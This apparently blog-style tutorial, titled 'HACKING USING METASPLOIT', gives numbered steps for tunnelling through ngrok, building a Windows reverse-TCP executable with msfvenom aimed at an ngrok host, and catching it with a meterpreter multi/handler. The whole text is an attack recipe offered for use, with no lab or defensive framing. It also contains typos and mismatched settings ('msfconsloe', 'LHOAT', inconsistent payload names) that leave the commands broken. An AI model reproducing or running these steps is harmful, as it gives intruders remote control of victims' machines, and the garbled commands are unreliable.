HACKING USING METASPLOIT
STEP
01: ngrok
official web site sing in, and ngrok setup download,
STEP
02: download
ngrok file right-click open terminal 01,
STEP 03: ngrok
official web side open, and rock authentication code copy, open terminal 01,
STEP 04: paste
on terminal 01, and authentication permission granted.
STEP 05: services
apache2 start (server
stsrt cmd)
STEP 06: ./ngrok
for execute cmd
STEP 07: ./ngrok
http <port number> ( apache2 server started)
STEP 08: download
ngrok file right-click open terminal 02,
ifconfig<local ipv4 addres>
STEP 09: ./ngrok
tcp <port number> (
apache2 server started)
STEP 10: download
ngrok file right click open terminal 03,
msfvenom –p windows/reverse-tcp LHOST=o.tcp.ngrok.io LPORT=8080 –f exe
<payload name>.exe
STEP 11: ls
(list of files)
STEP 12: msfconsloe
(open metasploit)
STEP 13: use
multi/handler
STEP 14: set
payload windows/meterpreter/reverse_tcp (payload
set on windows)
STEP 15: set
LHOAT <port number>
STEP 16: set
LHOAT (local ipv4 address)
STEP 17: set
LPORT <port number>
STEP 18: show
options (showing options)
STEP 19: exploit
(run cmd)
0 comments: